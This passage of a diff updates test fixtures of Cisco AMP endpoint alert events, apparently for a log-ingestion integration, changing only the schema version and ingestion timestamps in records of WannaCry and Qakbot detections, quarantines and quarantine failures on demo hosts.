Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741859\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2560,7 +2560,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2588,7 +2588,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094073050Z", + "ingested": "2021-09-13T18:07:42.929521872Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2654,7 +2654,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2686,7 +2686,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094074914Z", + "ingested": "2021-09-13T18:07:42.929523775Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -2747,7 +2747,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2779,7 +2779,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094076786Z", + "ingested": "2021-09-13T18:07:42.929525666Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2836,7 +2836,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -2864,7 +2864,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094078741Z", + "ingested": "2021-09-13T18:07:42.929527645Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2917,7 +2917,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -2937,7 +2937,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094080611Z", + "ingested": "2021-09-13T18:07:42.929529537Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2988,7 +2988,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3008,7 +3008,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094082470Z", + "ingested": "2021-09-13T18:07:42.929531441Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -3072,7 +3072,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3104,7 +3104,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094084360Z", + "ingested": "2021-09-13T18:07:42.929533342Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -3161,7 +3161,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3181,7 +3181,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:10.094086254Z", + "ingested": "2021-09-13T18:07:42.929535291Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "start": "2021-01-14T13:29:36.000Z", @@ -3228,7 +3228,7 @@ { "@timestamp": "2021-01-14T13:28:09.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3246,7 +3246,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:32:10.094088127Z", + "ingested": "2021-09-13T18:07:42.929537188Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6412574627503014000", "kind": "alert" @@ -3288,7 +3288,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3308,7 +3308,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094089991Z", + "ingested": "2021-09-13T18:07:42.929539100Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3365,7 +3365,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3395,7 +3395,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094091860Z", + "ingested": "2021-09-13T18:07:42.929540993Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3450,7 +3450,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3480,7 +3480,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094093728Z", + "ingested": "2021-09-13T18:07:42.929542884Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3533,7 +3533,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3553,7 +3553,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094095604Z", + "ingested": "2021-09-13T18:07:42.929544781Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3608,7 +3608,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3628,7 +3628,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094097475Z", + "ingested": "2021-09-13T18:07:42.929546661Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3683,7 +3683,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -3703,7 +3703,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:10.094099331Z", + "ingested": "2021-09-13T18:07:42.929548553Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -3758,7 +3758,7 @@ } }, 